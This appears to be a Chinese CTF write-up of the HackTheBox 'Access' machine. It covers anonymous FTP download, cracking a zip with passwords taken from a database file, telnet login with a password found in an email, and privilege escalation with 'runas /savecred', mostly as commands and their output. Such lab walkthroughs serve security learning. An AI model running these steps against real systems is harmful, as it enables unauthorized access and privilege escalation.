Hunter网络安全
Hunter网络安全

对HackTheBox里的Access靶场进行测试

首先,我要说这台机器花了我大约6小时来完成整个工作。我掉了几个万恶的坑里,最终的解决方案比我想象的要简单得多。

我的第一步。在新计算机上启动时,几乎总是这样,即执行nmap扫描以查看运行情况。

root@localhost:~/hackthebox/access# nmap -p- -sV -O 10.10.10.98
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-02 06:02 EST
Stats: 0:00:04 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 0.02% done
Stats: 0:00:59 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 16.93% done; ETC: 06:07 (0:04:30 remaining)
Nmap scan report for 10.10.10.98
Host is up (0.13s latency).
Not shown: 65532 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
23/tcp open  telnet?
80/tcp open  http    Microsoft IIS httpd 7.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista (89%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (89%), Microsoft Windows Phone 7.5 or 8.0 (89%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 683.84 seconds

从输出中我们可以看到有3个服务。Telnet,HTTP和FTP。首先检查HTTP是最简单的方法。所以我浏览到http://10.10.10.98,在其中显示了一个页面,其中包含称为out.jpg的图像,该图像显示了服务器机房的摄像机视图,在上方显示了文本LON-MC6。查看源时,页面上没有任何隐藏的内容。


<html>
<head>
<title>MegaCorptitle>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
head>

<body>
<div align="center">
  <p><strong><font size="5" face="Verdana, Arial, Helvetica, sans-serif">LON-MC6font>strong> p>
  <p><img border="0" src="out.jpg">p>
div>
body>
html>

因为,这似乎暂时还没有到位。接下来,我决定尝试通过使用ncftp进行连接以检查FTP服务:

root@localhost:~# ncftp 10.10.10.98
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).

Copyright (c) 1992-2011 by Mike Gleason.
All rights reserved.

Connecting to 10.10.10.98...
Microsoft FTP Service
Logging in...
User logged in.
Logged in to 10.10.10.98.
ncftp / > dir
connect failed: Connection refused.
connect failed: Connection refused.
connect failed: Connection refused.
Falling back to PORT instead of PASV mode.
List failed.
ncftp / > dir
d---------   1 ftpuser  ftpusers            0 Aug 23  2018 Backups
d---------   1 ftpuser  ftpusers            0 Aug 24  2018 Engineer
ncftp / > cd Backups
ncftp /Backups > dir
----------   1 ftpuser  ftpusers      5652480 Aug 23  2018 backup.mdb
ncftp /Backups > get backup.mdb
backup.mdb:                                              5.39 MB   76.00 kB/s
ncftp /Backups > cd ..
ncftp / > cd Engineer
ncftp /Engineer > dir
----------   1 ftpuser  ftpusers        10870 Aug 24  2018 Access Control.zip
ncftp /Engineer > get "Access Control.zip"
Access Control.zip:                                     10.62 kB    3.66 kB/s
ncftp /Engineer >

FTP服务接受来宾登录,因为它不提示输入密码。它包含两个称为“ Backups and Engineer”的目录,在“ Backups”中具有一个backup.mdb文件,在Engineer我最初尝试使用标准ftp命令而不是ncftp来执行此操作。但是由于某种原因,它不会正确下载备份。 mdb并损坏。因此,出于这个原因,我改用了ncftp,效果很好。然后,我厌倦了解压缩“ Access Control.zip”,但是它受到密码保护。

root@localhost:~# 7z e Access\ Control.zip

7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,1 CPU Intel(R) Xeon(R) CPU           L5520  @ 2.27GHz (106A4),ASM)

Scanning the drive for archives:
1 file, 10870 bytes (11 KiB)

Extracting archive: Access Control.zip
--
Path = Access Control.zip
Type = zip
Physical Size = 10870


Enter password (will not be echoed):
ERROR: Wrong password : Access Control.pst

Sub items Errors: 1

Archives with Errors: 1

Sub items Errors: 1
root@localhost:~#

然后,我将backup.mdb复制到我的Windows计算机上,并使用一些名为MDB Viewer的免费软件打开了该文件。该文件包含许多我搜索过的表。看上去很重要的一个表称为auth_user,其中包含3个用户/密码组合。我对“ Access Control.zip”上的每个密码都感到疲倦,密码access4u @ security可以解压缩并提取其中的PST文件。
对HackTheBox里的Access靶场进行测试_第1张图片
PST文件是交换邮箱的存储文件。我将PST文件导入到Thunderbird中,这使我可以查看文件中包含的电子邮件。
对HackTheBox里的Access靶场进行测试_第2张图片

From "[email protected]" Thu Aug 23 23:44:07 2018
Status: RO
From: [email protected] 
Subject: MegaCorp Access Control System "security" account
To: '[email protected]'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--boundary-LibPST-iamunique-1048588502_-_-"


----boundary-LibPST-iamunique-1048588502_-_-
Content-Type: multipart/alternative;
        boundary="alt---boundary-LibPST-iamunique-1048588502_-_-"

--alt---boundary-LibPST-iamunique-1048588502_-_-
Content-Type: text/plain; charset="utf-8"

Hi there,



The password for the "security" account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.



Regards,

John

我的下一步是通过使用电子邮件中提供的附加进行连接,检查nmap找到的最终Telnet服务。

ec2-user@kali:~/Documents/access$ telnet 10.10.10.98
Trying 10.10.10.98...
Connected to 10.10.10.98.
Escape character is '^]'.
Welcome to Microsoft Telnet Service 

login: security
password: 

*===============================================================
Microsoft Telnet Server.
*===============================================================
C:\Users\security>

一个用户标志存储在c:\ Users \ security \ Desktop \ user.txt中,一个根标志存储在c:\ Users \ security \ Desktop \ user.txt中。因此,我将其CD到桌面,将user.txt的内容输出到命令行。

C:\Users\security>cd Desktop

C:\Users\security\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 9C45-DBF0

 Directory of C:\Users\security\Desktop

08/28/2018  06:51 AM              .
08/28/2018  06:51 AM              ..
08/21/2018  10:37 PM                32 user.txt
               1 File(s)             32 bytes
               2 Dir(s)  16,768,454,656 bytes free

C:\Users\security\Desktop>type user.txt
{
     {
     REDACTED}}
C:\Users\security\Desktop>

因此,我们现在已经成功获取了用户标志。下一步是获取根标志。这是我花了最多的时间实现的目标。我花了很长时间尝试尝试上载并运行Shell并使用ZKAccess3.5程序执行权限升级,但是这些允许成功。最后一个功能的方法是使用runas命令。这允许您以其他用户的身份从命令行运行某些内容。因此,我本质上想做的就是运行命令“键入c:\ Users \ Administrator \桌面\ root.txt”。作为管理员。我最初尝试立即运行“ runas /用户:管理员”类型c:\用户\管理员\桌面\ root.txt。此问题是Runas产生了第二个窗口来运行命令并输出结果。所以您不会在窗口中看到输出。

C:\Users\security>runas /user:administrator "type c:\Users\Administrator\Desktop\root.txt""
Enter the password for administrator:

我尝试输入在backup.mdb中找到的其他密码,但是没有一个动作。我发现的是runas命令的一个选项,它允许您为用户使用保存的替代。因此,如果管理员帐户的替换保存在Windows可以使用管理员身份运行命令,而无需手动输入密码。这是通过使用/ savecred开关完成的。我发现再次使用了它,本来应该是root.txt的内容(root标志)的输出也是空白的。这是由于该命令在telnet会话之外的另一个视图中运行。经过大量的猜测和操作后,我发现以下命令启动了,从而允许我运行所需的命令变为结果输出到txt文件中,可以在当前会话中查看该文件。

C:\Users\security>runas /savecred /user:administrator "cmd /k type c:\Users\Administrator\Desktop\root.txt > c:\Users\security\bbdd.txt"

C:\Users\security>type bbdd.txt
{
     {
     REDACTED}}

如您所见,此操作成功完成,我能够以管理员身份执行命令并读取root.txt的内容。

关注:Hunter网络安全 获取更多资讯
网站:bbs.kylzrv.com
CTF团队:Hunter网络安全
文章:Xtrato
排版:Hunter-匿名者

你可能感兴趣的:(技术,nmap,安全,经验分享,pwn,其他)

  • react-11(自定义hook、useRef) 我只是想饮一杯奶茶 reactJavaScriptreact.jsjavascript前端typescript
    自定义hook主要是我们利用已有的hook,实现hook的效果,并在其他地方引用。(感觉像是封装了一个方法)//定义constfetchHook=(url)=>{const[data,setData]=useState({})const[loading,setLoading]=useState('')useEffect(()=>{setLoading('loading')axios.get(url
  • 区块链驱动金融第四章——比特币实用指南:存储与使用全解析 小DuDu 区块链金融
    在比特币的世界里,存储和使用比特币是每个参与者都必须面对的重要环节。第四章围绕这两个关键方面展开了详细的阐述,为我们提供了全面而深入的见解。现在,就让我们一起走进这一章,探索如何安全、便捷地存储和使用比特币。比特币的存储方式:多样选择,各有优劣简单本地储存:便捷与风险并存把比特币存储在本地设备上是最直接的方式,就像把钱放在钱包里一样方便。人们通常会使用比特币钱包软件来管理比特币和私钥,通过这些软件
  • Web Component 教程(六):基于 Stencil 脚手架开发 Web Component 乐闻x WebComponent学习记录前端webcomponentstencli
    前言在现代前端开发中,WebComponent是一种逐渐受到关注的技术,它允许我们创建可以在任何框架或库(如React,Angular,Vue等)中使用的可重用组件。而Stencil是一个强大的开发工具,它帮助我们轻松构建这些WebComponent,使开发过程更高效、更简洁。那么,究竟如何使用Stencil来开发WebComponent呢?今天,我们就来探索这一主题,从安装和设置,到创建和使用组
  • 基于Wasm的边缘计算Pandas:突破端侧AI的最后一公里——让数据分析在手机、IoT设备上飞驰 Eqwaak00 Pandas人工智能wasm边缘计算pandas架构深度学习
    引言:边缘计算的算力觉醒在智能家居设备每秒产生数万条传感器数据、手机App需要实时分析用户行为的今天,传统云计算模式面临高延迟、隐私风险、带宽成本三大挑战。本文将揭示如何通过WebAssembly(Wasm)+Pandas的技术组合,在边缘设备上实现零云端依赖的实时数据分析,并通过智慧工厂设备预测性维护案例,展示从理论到工程的全链路实现。一、技术架构设计1.1边缘计算范式演进mermaid:gra
  • 使用 MistralAI 平台进行开源模型托管与调用 VYSAHF python
    MistralAI是一个提供开放源码模型托管的平台,致力于帮助开发者更轻松地使用和管理开源模型。通过该平台,你可以方便地调用强大的深度学习模型,并将其集成到你的应用中。本文将带你了解如何利用MistralAI提供的服务来进行模型的托管和调用。技术背景介绍MistralAI的服务包括了如聊天模型和嵌入模型等,这些模型适用于聊天机器人、文本嵌入等各种场景。使用这些模型需要注册并获取一个有效的API密钥
  • 后“智驾平权”时代,谁为安全冗余和体验升级“买单” 高工智能汽车 安全人工智能
    线控底盘,正在成为新势力争夺下一个技术普及红利的新赛点。尤其是进入2025年,比亚迪、长安等一线传统自主品牌率先开启高阶智驾的普及战,加上此前已经普及的智能座舱,舱驾智能的「科技平权」进一步加速行业启动「线控底盘」上车窗口期。去年4月,华为数字能源率先对外发布了DriveONE纯电智动方案,并与车企在EMB线控制动领域率先展开深度合作。这套方案通过驱动和制动系统的融合控制,来大幅缩短刹车距离和高速
  • 【尚硅谷】鸿蒙应用开发 - 带源码课件 6v6-博客 harmonyos华为
    【尚硅谷】鸿蒙应用开发-带源码课件课程描述本教程精心设计了一款精致而小巧的实战应用,贯穿整个学习过程,真正做到理论与实践相结合。课程内容从基础到高级,层层递进,全面覆盖鸿蒙应用开发的所有必备技能。通过图解抽象知识、丰富的案例和清晰的讲解,帮助学习者快速掌握鸿蒙应用开发的核心技术。课程亮点实战驱动:以实际应用案例为主线,贯穿整个学习过程,让学习更贴近实际开发需求。内容全面:从基础概念到高级技能,系统
  • AI 大模型应用数据中心的数据迁移架构 AGI大模型与大数据研究院 DeepSeekR1&大数据AI人工智能javapythonjavascriptkotlingolang架构人工智能
    AI大模型、数据中心、数据迁移、架构设计、迁移策略、性能优化、安全保障1.背景介绍随着人工智能(AI)技术的飞速发展,大规模AI模型的应用日益广泛,涵盖了自然语言处理、计算机视觉、语音识别等多个领域。这些AI模型通常需要海量的数据进行训练和推理,因此数据中心作为AI应用的基础设施,显得尤为重要。然而,随着AI模型规模的不断扩大,数据中心面临着新的挑战:数据规模庞大:AI模型的训练和推理需要海量数据
  • 使用LangChain与Amazon Bedrock构建JCVD风格的Chatbot scaFHIO langchainpython
    技术背景介绍在人工智能时代,构建一个智能化的聊天机器人不仅是一个趋势,更是提升与用户互动体验的关键之一。本文将向你展示如何使用LangChain和AmazonBedrock构建一个仿效让·克劳德·范·达美(JCVD)风格的聊天机器人。我们将借助于Anthropic提供的Claude模型,通过AmazonBedrock强大的基础设施来实现这一目标。核心原理解析LangChain作为一个强大的框架,简
  • Node.js技术原理分析系列6——基于 V8 封装一个自己的 JavaScript 运行时 前端node.js
    Node.js是一个开源的、跨平台的JavaScript运行时环境,它允许开发者在服务器端运行JavaScript代码。Node.js是基于ChromeV8引擎构建的,专为高性能、高并发的网络应用而设计,广泛应用于构建服务器端应用程序、网络应用、命令行工具等。本系列将分为9篇文章为大家介绍Node.js技术原理:从调试能力分析到内置模块新增,从性能分析工具perf_hooks的用法到ChromeD
  • 实测 Gemini 2.0 Flash 图像生成:多模态 AI 的创作力边界 python
    近日,Google发布了Gemini2.0Flash的实验性图像生成功能(Gemini2.0Flash(ImageGeneration)Experimental)。我也第一时间体验了这一功能,再次感受到AI技术对传统图像处理工具的颠覆性冲击。本文从主要功能、安装方法、应用场景,并通过实际测试展示其能力,希望帮助大家更好地了解和使用这一工具。引言Gemini2.0Flash的实验性图像生成功能于20
  • 互联网打工人的发际线保卫战:与代码共舞,和头发共存
    凌晨两点的写字楼,键盘声与咖啡机嗡鸣交织成互联网人的夜曲。某大厂程序员小李摸了摸日渐稀疏的头顶,看着钉钉弹出的第17条客户反馈,突然意识到:在这场与需求、bug、OKR的持久战中,头发和健康正在悄然“掉线”。卫健委数据显示,互联网从业者脱发率高达36%,颈椎病患病率是其他行业的2.7倍。当996成为常态,如何守住最后一方头皮领土,成为互联网人的生存必修课。一、发量消失的元凶图谱三重暴击下的毛囊末日
  • 小红书不绑定手机号会显示ip吗 hgdlip iptcp/ip网络协议网络
    小红书作为一个生活方式分享平台,拥有庞大的用户群体。在小红书上,用户可以分享自己的生活点滴、购物心得、美食体验等,与其他用户进行互动交流。最近,不少用户对于小红书是否会在不绑定手机号的情况下显示IP属地产生了疑问,本文将深入探讨这一问题。对于小红书是否会在不绑定手机号的情况下显示IP地址这一问题,我们可以从以下几个方面进行分析:小红书的隐私政策‌:小红书一直致力于保护用户隐私,其隐私政策明确规定了
  • 在LangChain中传递运行时值给工具 bavDHAUO langchainwindowspython
    在使用LangChain开发智能应用时,我们经常需要将一些运行时的参数传递给工具。这些参数可能在请求时才被确定,比如请求用户的ID。在大多数情况下,这些参数不应该由LLM(大语言模型)控制,因为这样可能存在安全风险。因此,我们需要一种机制,让LLM只控制那些它需要控制的参数,而其他参数则由应用逻辑来固定。本指南将详细介绍如何在LangChain中实现这一点,即防止模型生成某些工具参数,并在运行时进
  • Cursor 终极使用指南:从零开始走向AI编程 芯作者 DD:日记人工智能机器学习深度学习AI编程
    在数字化浪潮席卷全球的今天,人工智能(AI)已不再是遥不可及的概念,而是逐渐融入我们日常生活的方方面面。作为未来技术的核心驱动力,AI编程成为了众多开发者和技术爱好者争相探索的领域。而在这场技术革命中,Cursor——这一看似简单却功能强大的编程工具,正悄然成为连接初学者与AI编程高手的桥梁。本文将带你从零开始,逐步解锁Cursor的终极使用指南,让你在AI编程的道路上越走越远。一、初识Curso
  • 基于知识图谱的个性化智能教学推荐系统(文档+源码) 「已注销」 python知识图谱人工智能pythonpygamepyqtdash
    目录摘要Abstract目录第1章绪论1.1研究背景及意义1.2国内外研究现状1.2.1知识图谱1.2.2个性化推荐系统1.3本文研究内容及创新点1.4全文组织结构第2章相关理论与技术概述2.1知识图谱2.1.1知识图谱的介绍与发展2.1.2知识图谱的构建2.3协同过滤推荐算法2.2.1推荐算法概述2.2.2Pearson相关系数2.2.3Spearman相关系数2.4Bert模型和Albert模
  • 知识管理系统:构建企业智慧大脑 AI天才研究院 ChatGPTAI大模型企业级应用开发实战DeepSeekR1&大数据AI人工智能大模型大厂Offer收割机面试题简历程序员读书硅基计算碳基计算认知计算生物计算深度学习神经网络大数据AIGCAGILLMJavaPython架构设计Agent程序员实现财富自由
    第一部分:知识管理概述与重要性第1章:知识管理的定义与基本概念1.1.1知识管理的起源与发展知识管理(KnowledgeManagement,KM)起源于20世纪80年代,当时企业在市场竞争中逐渐意识到知识作为一种战略资源的重要性。早期的知识管理实践主要集中在知识的收集、存储和传播上。随着信息技术的发展,知识管理逐渐融入了更先进的技术手段,如数据挖掘、人工智能和大数据分析,使其成为一个跨学科、多领
  • MySQL InnoDB 存储引擎详解 drebander 数据库mysqlandroid数据库
    InnoDB是MySQL中最常用、最强大的存储引擎之一,其支持事务、外键、行级锁等特性,非常适合对可靠性、并发性要求较高的场景。本文将详细解析InnoDB的核心特性、内部机制以及使用场景,帮助你更好地理解和优化MySQL数据库。1.为什么选择InnoDB存储引擎InnoDB是MySQL默认的存储引擎(从MySQL5.5开始)。相比其他存储引擎(如MyISAM),InnoDB的优势在于:支持事务:遵
  • 暗光增强技术研究进展与产品落地综合分析(2023-2025) AndrewHZ 深度学习新浪潮图像处理算法动态范围计算机视觉深度学习transformer暗光增强
    一、引言暗光增强技术作为计算机视觉与移动影像领域的核心研究方向之一,近年来在算法创新、硬件适配及产品落地方面取得了显著进展。本文从技术研究与产业应用两个维度,系统梳理近三年(2023-2025)该领域的关键突破,并对比分析主流手机厂商的影像技术优劣势。二、暗光增强技术研究进展1.算法创新:从传统模型到深度学习(1)Retinex理论的深度结合清华与ETH联合提出的Retinexformer(202
  • 【自学笔记】NFT基础知识点总览-持续更新 Long_poem 笔记区块链
    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档文章目录NFT(非同质化代币)基础知识点总览1.NFT简介2.NFT的应用场景3.NFT的工作原理4.NFT的创建和发行5.代码示例代码解释总结NFT(非同质化代币)基础知识点总览1.NFT简介NFT(Non-FungibleToken,非同质化代币)是一种基于区块链技术的独特数字资产,每个NFT都是唯一的、不可互换的。与同质化代币(
  • 5分钟科普:AI网关是什么?应用场景是什么?有没有开源的选择? 阿里-于怀 机器学习
    AI网关的功能及其定义AI网关位于企业应用与内外部大模型调用的交汇点,能够灵活地将请求转发给内部自建模型或外部大模型服务提供商,甚至海外的服务商。它管理着企业所有的AI出口流量,为企业内的不同团队提供了多方面的优势。对于开发团队而言,AI网关简化了模型的选择和使用过程,让他们可以专注于产品的快速迭代而无需担心成本控制或复杂的申请流程。针对安全和治理方面的团队而言,AI网关通过实施访问控制、加密传输
  • JAVA论文相关技术介绍(JAVA技术) Curry Peng java开发语言
    3.JAVA技术Java是一种广泛使用的编程语言,具有以下显著特点和优势:面向对象编程(OOP):支持封装、继承和多态等特性,使代码更具模块化、可维护性和可扩展性。平台独立性:Java程序可以在不同的操作系统和硬件平台上运行,只需安装相应的Java运行环境(JRE)。安全性:提供了强大的安全机制,包括访问控制、字节码验证等,确保程序的安全性和稳定性。丰富的类库:拥有大量预先编写好的类和接口,涵盖了
  • 使用opengl绘制立方体_一步步学OpenGL(25) -《Skybox天空盒子》 weixin_39962153 使用opengl绘制立方体
    教程25Skybox天空盒子原文:http://ogldev.atspace.co.uk/www/tutorial25/tutorial25.htmlCSDN完整版专栏:https://blog.csdn.net/cordova/article/category/9266966背景天空盒子是一种让场景看上去更广阔无垠的一种视觉技术,用无缝对接的封闭纹理将摄像机的视口360度无死角的包裹起来。封闭纹
  • 关于Linux SSH的那些知识点 协议捕手 Linux企业应用经验集linuxssh运维
    以下是LinuxSSH相关知识点的系统整理,涵盖基础概念、配置指南、安全实践及实际案例一、SSH核心知识点协议版本SSH-1(不安全,已淘汰)vsSSH-2(推荐,默认协议)加密机制:非对称加密(RSA/ECDSA)交换密钥+对称加密(AES/ChaCha20)传输数据密钥认证流程客户端生成私钥(~/.ssh/id_rsa)和公钥(~/.ssh/id_rsa.pub)公钥上传至服务器~/.ssh/
  • 华为OD机试九日集训第2期 - 按算法分类,由易到难,循序渐进,提升编程能力和解题技巧,从而提高机试通过率 哪 吒 搬砖工逆袭Java架构师华为od算法九日集训Java
    目录一、适合人群二、本期训练时间三、如何参加四、数据结构与算法大纲五、华为OD九日集训第1期第1天、逻辑分析第2天、队列第3天、双指针第4天栈第5天滑动窗口第6天、二叉树第7天、并查集第8天、矩阵第9天、贪心算法六、国内直接使用满血ChatGPT4o、o1、o3-mini-high、Claude3.7Sonnet、满血DeepSeekR11、纯原版ChatGPT、Claude2、技术支持3、支持所
  • 更好地进行SQL问题回答的提示技术 bavDHAUO sqloracle数据库python
    在SQL问题回答过程中,提示工程是生成正确SQL查询的关键。通过使用create_sql_query_chain,我们将探讨如何优化提示技术,以改善SQL查询生成。本文将重点讲述如何在提示中获得针对特定数据库的信息。技术背景介绍在使用自然语言生成SQL查询时,数据库的特定方言、表结构信息以及少量示例都能够显著提高生成查询的准确性。通过LangChain库,我们可以优化这些提示来帮助模型更好地理解和
  • AI系统API网关原理与代码实战案例讲解 AI大模型应用之禅 DeepSeekR1&AI大模型与大数据计算科学神经计算深度学习神经网络大数据人工智能大型语言模型AIAGILLMJavaPython架构设计AgentRPA
    AI系统API网关原理与代码实战案例讲解1.背景介绍在现代分布式系统中,API网关作为一个重要的组件,起到了至关重要的作用。它不仅仅是一个简单的请求路由器,更是一个集成了安全、负载均衡、缓存、监控等多种功能的综合性服务。特别是在AI系统中,API网关的作用尤为重要,因为AI系统通常需要处理大量的数据请求,并且需要保证高可用性和高性能。API网关的概念最早出现在微服务架构中,旨在解决微服务之间的通信
  • C#自动升级系统完整实现教程 Jay星晴
    本文还有配套的精品资源,点击获取简介:在C#开发中,实现软件自动升级机制是确保用户使用最新程序版本的重要技术手段。本文将详细介绍自动升级的基本概念、实现步骤、相关技术以及实际操作中需要关注的事项。内容涵盖如何通过网络请求检测版本更新、下载更新包、执行安装过程以及重启应用,同时强调安全性和用户体验等关键点。1.自动升级基本概念自动升级是什么自动升级是软件开发中的一种重要机制,允许软件在无需用户干预的
  • 智能家居产品很酷,记住这3个使用规则,让生活更安全 宛如清风 智能家居产品安全智能家居使用原则SCA智能家居安全物联网产品智能手表智能门锁SCA
    前言:在急于拥抱物联网设备的过程中,我们不能为了增加便利而以隐私和安全为代价。一个万物互联的世界来了。物联网革命改善了我们的家庭生活,为我们提供了从智能茶壶到智能洗衣机再到智能冰箱的各种智能家用电器,同时我们还拥有智能门铃和门锁、智能手机、智能手表等物联网设备,这使我们可以随时可查看追踪孩子位置的智能手表,以及追踪健康状况的健身追踪器。所有这些能使生活更加轻松,但这并不一定意味着它使我们的生活更加
  • 算力技术演进与多场景融合路径 智能计算研究中心 其他
    内容概要算力技术的演进正经历从异构计算到量子计算的范式跃迁。当前技术图谱中,芯片制程突破与架构创新持续推动算力密度提升,如5nm以下先进工艺与存算一体设计显著增强运算单元效率。与此同时,模型压缩、数据预处理等算法优化手段使单位算力产出提高30%以上。典型应用场景中,工业互联网通过自适应计算实现毫秒级实时控制,医疗影像领域借助分布式计算完成TB级数据处理,而智能安防系统依托边缘计算降低端到端时延至5
  • 二分查找排序算法 周凡杨 java二分查找排序算法折半
    一:概念 二分查找又称 折半查找( 折半搜索/ 二分搜索),优点是比较次数少,查找速度快,平均性能好;其缺点是要求待查表为有序表,且插入删除困难。因此,折半查找方法适用于不经常变动而 查找频繁的有序列表。首先,假设表中元素是按升序排列,将表中间位置记录的关键字与查找关键字比较,如果两者相等,则查找成功;否则利用中间位置记录将表 分成前、后两个子表,如果中间位置记录的关键字大于查找关键字,则进一步
  • java中的BigDecimal bijian1013 javaBigDecimal
            在项目开发过程中出现精度丢失问题,查资料用BigDecimal解决,并发现如下这篇BigDecimal的解决问题的思路和方法很值得学习,特转载。         原文地址:http://blog.csdn.net/ugg/article/de
  • Shell echo命令详解 daizj echoshell
    Shell echo命令 Shell 的 echo 指令与 PHP 的 echo 指令类似,都是用于字符串的输出。命令格式: echo string 您可以使用echo实现更复杂的输出格式控制。 1.显示普通字符串: echo "It is a test" 这里的双引号完全可以省略,以下命令与上面实例效果一致: echo Itis a test 2.显示转义
  • Oracle DBA 简单操作 周凡杨 oracle dba sql
    --执行次数多的SQL select sql_text,executions from (      select sql_text,executions from v$sqlarea order by executions desc      ) where rownum<81;  &nb
  • 画图重绘 朱辉辉33 游戏
      我第一次接触重绘是编写五子棋小游戏的时候,因为游戏里的棋盘是用线绘制的,而这些东西并不在系统自带的重绘里,所以在移动窗体时,棋盘并不会重绘出来。所以我们要重写系统的重绘方法。   在重写系统重绘方法时,我们要注意一定要调用父类的重绘方法,即加上super.paint(g),因为如果不调用父类的重绘方式,重写后会把父类的重绘覆盖掉,而父类的重绘方法是绘制画布,这样就导致我们
  • 线程之初体验 西蜀石兰 线程
    一直觉得多线程是学Java的一个分水岭,懂多线程才算入门。 之前看《编程思想》的多线程章节,看的云里雾里,知道线程类有哪几个方法,却依旧不知道线程到底是什么?书上都写线程是进程的模块,共享线程的资源,可是这跟多线程编程有毛线的关系,呜呜。。。 线程其实也是用户自定义的任务,不要过多的强调线程的属性,而忽略了线程最基本的属性。 你可以在线程类的run()方法中定义自己的任务,就跟正常的Ja
  • linux集群互相免登陆配置 林鹤霄 linux
    配置ssh免登陆 1、生成秘钥和公钥    ssh-keygen -t rsa 2、提示让你输入,什么都不输,三次回车之后会在~下面的.ssh文件夹中多出两个文件id_rsa 和 id_rsa.pub    其中id_rsa为秘钥,id_rsa.pub为公钥,使用公钥加密的数据只有私钥才能对这些数据解密    c
  • mysql : Lock wait timeout exceeded; try restarting transaction aigo mysql
    原文:http://www.cnblogs.com/freeliver54/archive/2010/09/30/1839042.html   原因是你使用的InnoDB   表类型的时候, 默认参数:innodb_lock_wait_timeout设置锁等待的时间是50s, 因为有的锁等待超过了这个时间,所以抱错.   你可以把这个时间加长,或者优化存储
  • Socket编程 基本的聊天实现。 alleni123 socket
    public class Server { //用来存储所有连接上来的客户 private List<ServerThread> clients; public static void main(String[] args) { Server s = new Server(); s.startServer(9988); } publi
  • 多线程监听器事件模式(一个简单的例子) 百合不是茶 线程监听模式
        多线程的事件监听器模式   监听器时间模式经常与多线程使用,在多线程中如何知道我的线程正在执行那什么内容,可以通过时间监听器模式得到        创建多线程的事件监听器模式 思路:    1, 创建线程并启动,在创建线程的位置设置一个标记     2,创建队
  • spring InitializingBean接口 bijian1013 javaspring
    spring的事务的TransactionTemplate,其源码如下: public class TransactionTemplate extends DefaultTransactionDefinition implements TransactionOperations, InitializingBean{ ... } TransactionTemplate继承了DefaultT
  • Oracle中询表的权限被授予给了哪些用户 bijian1013 oracle数据库权限
            Oracle查询表将权限赋给了哪些用户的SQL,以备查用。 select t.table_name as "表名", t.grantee as "被授权的属组", t.owner as "对象所在的属组"
  • 【Struts2五】Struts2 参数传值 bit1129 struts2
    Struts2中参数传值的3种情况 1.请求参数绑定到Action的实例字段上 2.Action将值传递到转发的视图上 3.Action将值传递到重定向的视图上   一、请求参数绑定到Action的实例字段上以及Action将值传递到转发的视图上 Struts可以自动将请求URL中的请求参数或者表单提交的参数绑定到Action定义的实例字段上,绑定的规则使用ognl表达式语言
  • 【Kafka十四】关于auto.offset.reset[Q/A] bit1129 kafka
    I got serveral questions about  auto.offset.reset. This configuration parameter governs how  consumer read the message from  Kafka when  there is no initial offset in ZooKeeper or
  • nginx gzip压缩配置 ronin47 nginx gzip 压缩范例
    nginx gzip压缩配置 更多 0 nginx gzip 配置   随着nginx的发展,越来越多的网站使用nginx,因此nginx的优化变得越来越重要,今天我们来看看nginx的gzip压缩到底是怎么压缩的呢? gzip(GNU-ZIP)是一种压缩技术。经过gzip压缩后页面大小可以变为原来的30%甚至更小,这样,用
  • java-13.输入一个单向链表,输出该链表中倒数第 k 个节点 bylijinnan java
    two cursors. Make the first cursor go K steps first. /* * 第 13 题:题目:输入一个单向链表,输出该链表中倒数第 k 个节点 */ public void displayKthItemsBackWard(ListNode head,int k){ ListNode p1=head,p2=head;
  • Spring源码学习-JdbcTemplate queryForObject bylijinnan javaspring
    JdbcTemplate中有两个可能会混淆的queryForObject方法: 1. Object queryForObject(String sql, Object[] args, Class requiredType) 2. Object queryForObject(String sql, Object[] args, RowMapper rowMapper) 第1个方法是只查
  • [冰川时代]在冰川时代,我们需要什么样的技术? comsci 技术
         看美国那边的气候情况....我有个感觉...是不是要进入小冰期了?      那么在小冰期里面...我们的户外活动肯定会出现很多问题...在室内呆着的情况会非常多...怎么在室内呆着而不发闷...怎么用最低的电力保证室内的温度.....这都需要技术手段...   &nb
  • js 获取浏览器型号 cuityang js浏览器
    根据浏览器获取iphone和apk的下载地址 <!DOCTYPE html> <html> <head>     <meta charset="utf-8" content="text/html"/>     <meta name=
  • C# socks5详解 转 dalan_123 socketC#
